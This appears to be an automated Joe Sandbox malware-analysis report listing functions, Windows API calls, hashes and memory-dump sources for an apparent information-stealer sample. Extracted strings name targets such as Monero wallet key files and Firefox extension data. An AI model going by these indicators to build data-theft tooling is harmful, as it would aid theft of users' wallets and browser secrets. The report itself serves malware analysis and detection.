                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: bbeead30ad97894ed35688000ef4ece4ab0106105735e42421d09b75ca3c0f58
                                  • Instruction ID: f9644afa49cbc89ef35598412224580adcefec2d66ad66e1a636c7505ea5321c
                                  • Opcode Fuzzy Hash: bbeead30ad97894ed35688000ef4ece4ab0106105735e42421d09b75ca3c0f58
                                  • Instruction Fuzzy Hash: 1D41E9B15007AC9EDB228B249D85FFF7BEC9F55704F1444E8D9C686182E279AB84CF60
                                  Function 00726630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00726663
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00726726
                                  • ExitProcess.KERNEL32 ref: 00726755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: f067ef7402291f563117328891aa4be691421f1cf78b13f41e7574d8f80f93db
                                  • Instruction ID: 823dfc3ef9e9dcc4d4bf449886fad9407d06856a936a03fa450a5667dd71a88d
                                  • Opcode Fuzzy Hash: f067ef7402291f563117328891aa4be691421f1cf78b13f41e7574d8f80f93db
                                  • Instruction Fuzzy Hash: 52311CB1811228EBDB55EB90EC96FDD7778AF08300F404199F20566191DF786B89CF5A
                                  Function 007287C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00730E28,00000000,?), ref: 0072882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00728836
                                  • wsprintfA.USER32 ref: 00728850
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 0c64ba58ab1ca1bc4adbfbff0e9b2326d500fa141f33593a47b7ec47776b04cb
                                  • Instruction ID: 3acf1648086938a87bb6f05387ac795bd6cac6c39120f87e249593fa829c979b
                                  • Opcode Fuzzy Hash: 0c64ba58ab1ca1bc4adbfbff0e9b2326d500fa141f33593a47b7ec47776b04cb
                                  • Instruction Fuzzy Hash: B3214FB1E54308AFDB04DF95DD49FAEBBB8FB48701F104219F605A7280C779A900DBA5
                                  Function 00728D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0072951E,00000000), ref: 00728D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00728D62
                                  • wsprintfW.USER32 ref: 00728D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: def812b199d311e078382f59cb7289be14fc4395300007f8e7b9e2779b11fc9f
                                  • Instruction ID: e4d352cfc832f518b17127bb901b94519234cbe68fcfcbb3b9ceb9ecdb944013
                                  • Opcode Fuzzy Hash: def812b199d311e078382f59cb7289be14fc4395300007f8e7b9e2779b11fc9f
                                  • Instruction Fuzzy Hash: 04E08CB0A54308BBD700DB95DC0AE6977B8EB08702F000294FE0987280DA759E10AB9A
                                  Function 0071A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0071A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0071A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 0071A6BC
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 0071A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c558548924308ea99b56447e327d0d8ba2704b3231b4db6dc7664f6e2d054d35
                                  • Instruction ID: 00c3c4a6301c95dd977267f98cc89654a2844cda2bdac9dd510a71c2d39730b4
                                  • Opcode Fuzzy Hash: c558548924308ea99b56447e327d0d8ba2704b3231b4db6dc7664f6e2d054d35
                                  • Instruction Fuzzy Hash: 1BE1C572810118EBDB05FBA4EC9AEEE7378BF14300F508569F51776091EF386A49CB66
                                  Function 0071D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0071D481
                                  • lstrlen.KERNEL32(00000000), ref: 0071D698
                                  • lstrlen.KERNEL32(00000000), ref: 0071D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0071D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 1b0be82e9be2f983f305f5b7f73b6a179270bee9673fa1d2b82c918efeb0345b
                                  • Instruction ID: f79e2b1c9f31a234ef3229e9bcf87702a78ccf683cba0e93d15c536dbc31db0b
                                  • Opcode Fuzzy Hash: 1b0be82e9be2f983f305f5b7f73b6a179270bee9673fa1d2b82c918efeb0345b
                                  • Instruction Fuzzy Hash: E9912672810128EBDB05FBA4EC9ADEE7378EF14300F504568F50776092EF386A49CB66
                                  Function 0071D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0071D801
                                  • lstrlen.KERNEL32(00000000), ref: 0071D99F
                                  • lstrlen.KERNEL32(00000000), ref: 0071D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0071DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 35dd85a3711a727317c8ab4dbe1b52bfd26e748ccc08b39d61995c73891820d4
                                  • Instruction ID: bfa5b64167677df8a73c21cb6c4d8f8b452ff702b0b4cf18f5534ab60a348b7e
                                  • Opcode Fuzzy Hash: 35dd85a3711a727317c8ab4dbe1b52bfd26e748ccc08b39d61995c73891820d4
                                  • Instruction Fuzzy Hash: EB81F771910128EBDB05FBA4EC5ADEE7378FF14300F504529F507A6091EF386A49DB66
                                  Function 0071F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00731580,00730D92), ref: 0071F54C
                                  • lstrlen.KERNEL32(00000000), ref: 0071F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 4dbe0ded40edeeb6b0882fe312416705f8cb28b08f6cc30c57b70d006bc172c9
                                  • Instruction ID: 662a9754a673dc071c3060f896f165c9338bf157a9670d0c66066cd439626c1d
                                  • Opcode Fuzzy Hash: 4dbe0ded40edeeb6b0882fe312416705f8cb28b08f6cc30c57b70d006bc172c9
                                  • Instruction Fuzzy Hash: 4551F171D10118FBDB04FBA4EC9ADED7378EF54300F408528F91667192EE386A49CBA6
                                  Function 007270D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                                  Download Yara Rule
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0072718C
                                  • sr, xrefs: 007272AE, 00727179, 0072717C
                                  • sr, xrefs: 00727111
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: sr$sr$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 3722407311-1245071467
                                  • Opcode ID: 0f0c76fb2129cf2e039b2d2d2c3a52174c7fe812c4630193ad7c96603a166c93
                                  • Instruction ID: f13db904bf06814cd41edb9757b4b9572b4519b185787657262b9604015ced94
                                  • Opcode Fuzzy Hash: 0f0c76fb2129cf2e039b2d2d2c3a52174c7fe812c4630193ad7c96603a166c93
                                  • Instruction Fuzzy Hash: 535166B1D0422CEBDB18EB90ED95BEDB3B4AF54304F1041A9E21577182EB786E88CF55
                                  Function 00723560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
